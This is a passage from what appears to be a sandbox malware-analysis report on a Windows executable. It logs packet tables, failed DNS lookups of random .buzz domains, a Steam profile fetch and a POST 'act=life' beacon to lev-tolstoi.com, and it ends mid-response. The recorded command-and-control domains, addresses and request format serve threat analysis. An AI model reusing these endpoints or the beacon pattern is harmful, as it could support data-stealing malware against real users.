                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:46.408154011 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.406361103 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.406461000 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.406516075 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.406618118 CET49718443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.406647921 CET44349718172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.509658098 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.509697914 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.509793043 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.510119915 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:47.510149956 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.769134045 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.769334078 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.770864010 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.770879030 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.772042990 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.773428917 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.773571014 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.773827076 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.773885965 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:48.815339088 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.725130081 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.725224018 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.725305080 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.725495100 CET49724443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.725511074 CET44349724172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.892503023 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.892560959 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.892646074 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.892993927 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:49.893013000 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.149714947 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.149799109 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.153042078 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.153062105 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.153397083 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.157062054 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.157406092 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.157450914 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.157540083 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:51.157558918 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.119107962 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.119211912 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.119283915 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.119641066 CET49734443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.119658947 CET44349734172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.493932009 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.493983984 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.494062901 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.494503021 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:52.494525909 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.751593113 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.751677036 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.765309095 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.765330076 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.765655041 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.780051947 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.780143023 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:53.780152082 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:54.892508984 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:54.892617941 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:54.892672062 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:54.892884016 CET49745443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:54.892905951 CET44349745172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:55.406845093 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:55.406872034 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:55.406949043 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:55.407221079 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:55.407236099 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.617865086 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.618002892 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.628875017 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.628901005 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.629292965 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.682363987 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.691366911 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.692131042 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.692158937 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.692274094 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.692342997 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.694577932 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.694607973 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.696830034 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.696861029 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698319912 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698355913 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698538065 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698566914 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698581934 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698596001 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698729038 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698753119 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.698779106 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.701675892 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.701706886 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739336967 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739484072 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739502907 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739525080 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739536047 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739568949 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:56.739579916 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.202307940 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.202404022 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.202477932 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.202676058 CET49752443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.202693939 CET44349752172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230458975 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230524063 CET44349764172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.230600119 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.231127977 CET49764443192.168.2.6172.67.157.254
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.231139898 CET44349764172.67.157.254192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:41:00.510680914 CET49764443192.168.2.6172.67.157.254

                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.603434086 CET5143053192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.744663954 CET53514301.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.754966021 CET5471253192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.894984961 CET53547121.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.898767948 CET5419453192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.038850069 CET53541941.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.042294979 CET5273653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.182410955 CET53527361.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.187078953 CET5438853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.330739021 CET53543881.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.334434986 CET6502153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.474453926 CET53650211.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.482669115 CET6237353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.624663115 CET53623731.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.628227949 CET5933853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.767657995 CET53593381.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.770257950 CET5595553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.913577080 CET53559551.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.917455912 CET5496653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.058557987 CET53549661.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.582607985 CET6540153192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.726042986 CET53654011.1.1.1192.168.2.6

                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.603434086 CET192.168.2.61.1.1.10xf333Standard query (0)mindhandru.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.754966021 CET192.168.2.61.1.1.10x2ef5Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.898767948 CET192.168.2.61.1.1.10x4d74Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.042294979 CET192.168.2.61.1.1.10x120dStandard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.187078953 CET192.168.2.61.1.1.10xe07Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.334434986 CET192.168.2.61.1.1.10x6cf2Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.482669115 CET192.168.2.61.1.1.10x3b5cStandard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.628227949 CET192.168.2.61.1.1.10xb32fStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.770257950 CET192.168.2.61.1.1.10xa050Standard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.917455912 CET192.168.2.61.1.1.10x63acStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.582607985 CET192.168.2.61.1.1.10x65a4Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.744663954 CET1.1.1.1192.168.2.60xf333Name error (3)mindhandru.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:36.894984961 CET1.1.1.1192.168.2.60x2ef5Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.038850069 CET1.1.1.1192.168.2.60x4d74Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.182410955 CET1.1.1.1192.168.2.60x120dName error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.330739021 CET1.1.1.1192.168.2.60xe07Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.474453926 CET1.1.1.1192.168.2.60x6cf2Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.624663115 CET1.1.1.1192.168.2.60x3b5cName error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.767657995 CET1.1.1.1192.168.2.60xb32fName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:37.913577080 CET1.1.1.1192.168.2.60xa050Name error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:38.058557987 CET1.1.1.1192.168.2.60x63acNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.726042986 CET1.1.1.1192.168.2.60x65a4No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 28, 2024 09:40:40.726042986 CET1.1.1.1192.168.2.60x65a4No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                                      • lev-tolstoi.com

                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      0192.168.2.64970823.55.153.1064436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:39 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:40 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:40 GMT
                                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: sessionid=7fd2a94ddba340e7c47d3e1d; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                      2024-12-28 08:40:40 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                      2024-12-28 08:40:40 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                      2024-12-28 08:40:40 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      1192.168.2.649711172.67.157.2544436032C:\Users\user\Desktop\k7T6akLcAr.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-28 08:40:42 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                      2024-12-28 08:40:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                                      2024-12-28 08:40:42 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Date: Sat, 28 Dec 2024 08:40:42 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=ma09t73f7pl0jnpq82h2lf9nfl; expires=Wed, 23 Apr 2025 02:27:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1VoHIqpdiTrynSczIAieAAeDtC%2BRERxzSbctWw07AEmk6gHcllXYvuq2SMhVrNp5lHIdj6cv1L79ilQm%2F1uuOkFKJCh6HVZ6RexubTBAeFe7wwguTIwzf2mDnI1kL7gShw4%3D"}],"group":"cf-nel","max_age":604800}
